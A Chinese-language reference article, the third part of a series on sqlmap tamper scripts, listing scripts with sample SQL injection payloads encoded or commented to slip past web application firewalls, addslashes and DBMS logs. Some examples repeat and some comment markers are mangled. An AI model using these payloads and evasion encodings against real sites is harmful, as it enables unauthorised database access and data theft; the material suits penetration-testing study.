企业资讯
- 企业新闻
- 行业文章

Sqlmap Tamper大全（3）

sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术，分别是盲推理SQL注入，UNION查询SQL 注入，堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹，枚举，数据库提取，访问目标文件系统，并在获取完全操作权限时实行任意命令。在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。

本文是Sqlmap Tamper大全的最后一章，想阅读前两章的同学，可以点这里：《Sqlmap Tamper大全（1）》《Sqlmap Tamper大全（2）》

脚本名：sp_password.py

作用：追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

Example:

 (’1 AND 9227=9227– ‘) ’1 AND 9227=9227– sp_password’

1 2	(’1 AND 9227=9227– ‘) ’1 AND 9227=9227– sp_password’

Requirement:

* MSSQL

———————————————————————————

脚本名：chardoubleencode.py 双url编码(不处理以编码的)

Example:

 * Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

1 2	* Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

———————————————————————————

脚本名：unionalltounion.py

作用：替换UNION ALL SELECT UNION SELECT

Example:

 (‘-1 UNION ALL SELECT’) ‘-1 UNION SELECT’

1 2	(‘-1 UNION ALL SELECT’) ‘-1 UNION SELECT’

Requirement:

all

——————————————————————————-

脚本名：charencode.py

作用：url编码

Example:

 * Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

1 2	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset

The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS

————————————————————

脚本名：randomcase.py

作用：随机大小写

Example:

 * Input: INSERT * Output: InsERt

1 2	* Input: INSERT * Output: InsERt

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

———————————————————————-

脚本名：unmagicquotes.py

作用：宽字符绕过 GPC addslashes

Example:

 * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

1 2	* Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

Notes:

Useful for bypassing magic_quotes/addslashes feature

——————————————————————————–

脚本名：randomcomments.py

作用：用/**/分割sql关键字

Example:

 ‘INSERT’ becomes ‘IN//S//ERT’

1	‘INSERT’ becomes ‘IN//S//ERT’

————————————————————————

脚本名：versionedkeywords.py

作用：Encloses each non-function keyword with versioned MySQL comment

Example:

 * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# * Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:

* MySQL

—————————————————————————-

脚本名：charunicodeencode.py

作用：字符串 unicode 编码

Example:

 * Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

1 2	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

* ASP

* ASP.NET

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

* MySQL 5.1.56

* PostgreSQL 9.0.3

Notes:

Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset

—————————————————————————-

脚本名：securesphere.py

作用：追加特制的字符串

Example:

 (’1 AND 1=1′) “1 AND 1=1 and ’0having’=’0having’”

1 2	(’1 AND 1=1′) “1 AND 1=1 and ’0having’=’0having’”

Tested against:

all

—————————————————————————-

脚本名：versionedmorekeywords.py

作用：注释绕过

Example:

 * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# * Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

* MySQL >= 5.1.13

—————————————————————————-

脚本名：space2comment.py

作用：Replaces space character (‘ ‘) with comments ‘/**/’

Example:

 * Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users

1 2	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

Useful to bypass weak and bespoke web application firewalls

—————————————————————————-

脚本名：halfversionedmorekeywords.py

作用：关键字前加注释

Example:

 * Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa * Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=’QDWa

* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa

* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=’QDWa

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

—————————————————————————-

本文是Sqlmap Tamper大全的最后一章，想阅读前两章的同学，可以点这里：《Sqlmap Tamper大全（1）》《Sqlmap Tamper大全（2）》

via@凌霄飞龙首发91ri.org

鸿大千秋网站建设团队敬上